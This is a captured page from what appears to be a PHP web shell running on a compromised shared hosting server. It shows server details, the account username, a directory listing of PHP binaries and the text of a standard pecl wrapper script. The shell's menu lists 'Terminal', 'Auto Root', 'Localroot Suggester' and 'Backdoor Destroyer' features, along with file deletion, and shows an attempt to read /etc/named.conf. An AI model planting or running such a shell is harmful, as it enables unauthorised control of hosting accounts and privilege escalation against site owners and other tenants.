Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php85 /
usr /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
lsphp
10.87
MB
-rwxr-xr-x
2026-07-10 16:24
pear
1.44
KB
-rwxr-xr-x
2026-03-16 10:56
peardev
428
B
-rwxr-xr-x
2026-03-16 10:56
pecl
319
B
-rwxr-xr-x
2026-03-16 10:56
phar
14.91
KB
-rwxr-xr-x
2026-07-10 16:23
phar.phar
14.91
KB
-rwxr-xr-x
2026-07-10 16:23
php
10.87
MB
-rwxr-xr-x
2026-07-10 16:24
php-cgi
10.87
MB
-rwxr-xr-x
2026-07-10 16:24
php-config
7.68
KB
-rwxr-xr-x
2026-07-10 16:23
phpdbg
10.87
MB
-rwxr-xr-x
2026-07-10 16:24
phpize
5.03
KB
-rwxr-xr-x
2026-07-10 16:23
Save
Rename
#!/bin/sh alt_php_dir="/opt/alt/php85" exec $alt_php_dir/usr/bin/php -C -n -q \ -d include_path=$alt_php_dir/usr/share/pear \ -d date.timezone=UTC \ -d output_buffering=1 \ -d variables_order=EGPCS \ -d safe_mode=0 \ -d register_argc_argv="On" \ $alt_php_dir/usr/share/pear/peclcmd.php "$@"